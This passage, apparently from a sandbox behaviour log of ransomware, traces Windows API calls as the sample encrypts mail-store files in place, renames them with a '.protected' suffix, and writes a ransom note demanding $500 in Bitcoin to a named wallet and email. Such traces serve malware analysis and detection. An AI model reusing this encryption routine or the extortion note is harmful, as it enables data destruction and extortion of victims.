lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0085.354] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.354] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0085.355] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.355] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0085.357] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0085.357] CloseHandle (hObject=0x154) returned 1 [0085.357] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\WindowsMail.MSMessageStore.protected") returned 118 [0085.357] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\WindowsMail.MSMessageStore" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\backup\\old\\windowsmail.msmessagestore"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\WindowsMail.MSMessageStore.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\backup\\old\\windowsmail.msmessagestore.protected")) returned 1 [0085.358] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0085.358] lstrcmpiW (lpString1="WindowsMail.pat", lpString2="Windows") returned 1 [0085.358] lstrcmpiW (lpString1="WindowsMail.pat", lpString2="Program Files") returned 1 [0085.358] lstrcmpiW (lpString1="WindowsMail.pat", lpString2="Program Files (x86)") returned 1 [0085.358] lstrcmpiW (lpString1="WindowsMail.pat", lpString2="$Recycle.bin") returned 1 [0085.358] lstrcmpiW (lpString1="WindowsMail.pat", lpString2="System Volume Information") returned 1 [0085.358] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\WindowsMail.pat") returned 97 [0085.358] StrStrIW (lpFirst="WindowsMail.pat", lpSrch=".protected") returned 0x0 [0085.358] lstrcmpW (lpString1="WindowsMail.pat", lpString2="RESTORE_FILES.txt") returned 1 [0085.358] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0085.358] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0085.359] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\WindowsMail.pat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\backup\\old\\windowsmail.pat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0085.359] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\WindowsMail.pat") returned 97 [0085.359] StrStrW (lpFirst="WindowsMail.pat", lpSrch=".txt") returned 0x0 [0085.359] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\WindowsMail.pat") returned 97 [0085.359] StrStrW (lpFirst="WindowsMail.pat", lpSrch=".rar") returned 0x0 [0085.359] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\WindowsMail.pat") returned 97 [0085.359] StrStrW (lpFirst="WindowsMail.pat", lpSrch=".zip") returned 0x0 [0085.359] ReadFile (in: hFile=0x154, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0085.368] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.368] WriteFile (in: hFile=0x154, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e544*=0x2800, lpOverlapped=0x0) returned 1 [0085.369] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.369] WriteFile (in: hFile=0x154, lpBuffer=0x295e51c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x295e51c*, lpNumberOfBytesWritten=0x295e544*=0x4, lpOverlapped=0x0) returned 1 [0085.369] WriteFile (in: hFile=0x154, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e544*=0x30, lpOverlapped=0x0) returned 1 [0085.369] CloseHandle (hObject=0x154) returned 1 [0085.370] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\WindowsMail.pat.protected") returned 107 [0085.370] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\WindowsMail.pat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\backup\\old\\windowsmail.pat"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\WindowsMail.pat.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\backup\\old\\windowsmail.pat.protected")) returned 1 [0085.370] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0085.370] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0085.370] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\RESTORE_FILES.txt") returned 99 [0085.370] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\old\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\backup\\old\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0085.371] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0085.371] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0085.372] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0085.372] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0085.372] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0085.372] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0085.372] CloseHandle (hObject=0x150) returned 1 [0085.372] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0085.372] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0085.372] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\RESTORE_FILES.txt") returned 95 [0085.372] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\backup\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0085.373] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0085.373] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0085.373] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0085.373] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0085.373] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0085.373] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0085.373] CloseHandle (hObject=0x14c) returned 1 [0085.374] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0085.374] lstrcmpiW (lpString1="edb.chk", lpString2="Windows") returned -1 [0085.374] lstrcmpiW (lpString1="edb.chk", lpString2="Program Files") returned -1 [0085.374] lstrcmpiW (lpString1="edb.chk", lpString2="Program Files (x86)") returned -1 [0085.374] lstrcmpiW (lpString1="edb.chk", lpString2="$Recycle.bin") returned 1 [0085.374] lstrcmpiW (lpString1="edb.chk", lpString2="System Volume Information") returned -1 [0085.374] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb.chk") returned 78 [0085.374] StrStrIW (lpFirst="edb.chk", lpSrch=".protected") returned 0x0 [0085.374] lstrcmpW (lpString1="edb.chk", lpString2="RESTORE_FILES.txt") returned -1 [0085.374] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0085.374] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0085.375] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb.chk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\edb.chk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0085.375] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb.chk") returned 78 [0085.375] StrStrW (lpFirst="edb.chk", lpSrch=".txt") returned 0x0 [0085.375] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb.chk") returned 78 [0085.375] StrStrW (lpFirst="edb.chk", lpSrch=".rar") returned 0x0 [0085.375] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb.chk") returned 78 [0085.375] StrStrW (lpFirst="edb.chk", lpSrch=".zip") returned 0x0 [0085.375] ReadFile (in: hFile=0x14c, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ea24*=0x2000, lpOverlapped=0x0) returned 1 [0085.376] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffe000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.377] WriteFile (in: hFile=0x14c, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ea24*=0x2000, lpOverlapped=0x0) returned 1 [0085.377] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.377] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0085.377] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0085.377] CloseHandle (hObject=0x14c) returned 1 [0085.377] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb.chk.protected") returned 88 [0085.377] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb.chk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\edb.chk"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb.chk.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\edb.chk.protected")) returned 1 [0085.378] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0085.378] lstrcmpiW (lpString1="edb.log", lpString2="Windows") returned -1 [0085.378] lstrcmpiW (lpString1="edb.log", lpString2="Program Files") returned -1 [0085.378] lstrcmpiW (lpString1="edb.log", lpString2="Program Files (x86)") returned -1 [0085.378] lstrcmpiW (lpString1="edb.log", lpString2="$Recycle.bin") returned 1 [0085.378] lstrcmpiW (lpString1="edb.log", lpString2="System Volume Information") returned -1 [0085.378] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log") returned 78 [0085.378] StrStrIW (lpFirst="edb.log", lpSrch=".protected") returned 0x0 [0085.378] lstrcmpW (lpString1="edb.log", lpString2="RESTORE_FILES.txt") returned -1 [0085.378] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0085.378] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0085.378] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\edb.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0085.379] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log") returned 78 [0085.379] StrStrW (lpFirst="edb.log", lpSrch=".txt") returned 0x0 [0085.379] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log") returned 78 [0085.379] StrStrW (lpFirst="edb.log", lpSrch=".rar") returned 0x0 [0085.379] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log") returned 78 [0085.379] StrStrW (lpFirst="edb.log", lpSrch=".zip") returned 0x0 [0085.379] ReadFile (in: hFile=0x14c, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0085.388] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.389] WriteFile (in: hFile=0x14c, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0085.389] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.389] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0085.391] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0085.391] CloseHandle (hObject=0x14c) returned 1 [0085.391] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log.protected") returned 88 [0085.391] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\edb.log"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb.log.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\edb.log.protected")) returned 1 [0085.392] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0085.392] lstrcmpiW (lpString1="edb00001.log", lpString2="Windows") returned -1 [0085.392] lstrcmpiW (lpString1="edb00001.log", lpString2="Program Files") returned -1 [0085.392] lstrcmpiW (lpString1="edb00001.log", lpString2="Program Files (x86)") returned -1 [0085.392] lstrcmpiW (lpString1="edb00001.log", lpString2="$Recycle.bin") returned 1 [0085.392] lstrcmpiW (lpString1="edb00001.log", lpString2="System Volume Information") returned -1 [0085.392] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log") returned 83 [0085.392] StrStrIW (lpFirst="edb00001.log", lpSrch=".protected") returned 0x0 [0085.392] lstrcmpW (lpString1="edb00001.log", lpString2="RESTORE_FILES.txt") returned -1 [0085.392] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0085.392] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0085.392] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\edb00001.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0085.393] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log") returned 83 [0085.393] StrStrW (lpFirst="edb00001.log", lpSrch=".txt") returned 0x0 [0085.393] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edb00001.log") returned 83 [0085.393] StrStrW (lpFirst="edb00001.log", lpSrch=".rar") returned 0x0 [0085.393] lstrlenW 